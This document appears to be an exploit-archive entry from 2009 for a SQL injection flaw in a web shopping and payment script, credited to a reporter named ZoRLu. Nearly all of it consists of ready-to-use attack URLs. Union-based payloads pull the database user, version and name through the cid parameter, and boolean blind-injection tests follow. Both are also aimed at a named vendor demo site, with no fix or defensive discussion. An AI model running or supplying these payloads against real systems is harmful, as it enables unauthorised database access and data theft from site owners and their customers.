Payment Processor Script (shop.htm cid) SQL Injection Vulnerability

2009-08-03T00:00:00
ID 1337DAY-ID-5610
Type zdt
Reporter ZoRLu
Modified 2009-08-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Payment Processor Script (shop.htm cid) SQL Injection Vulnerability
===================================================================



[~] PaymentProcessorScript.net R-Sql/B-Sql Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  
[~]
[~] Date: 04.01.09
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

R-Sql

http://site.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

B-Sql

http://site.com/shop.htm?cid=[id]+and+1=1    true

http://site.com/shop.htm?cid=[id]+and+1=100  false

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=1

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100



#  0day.today [2018-04-14]  #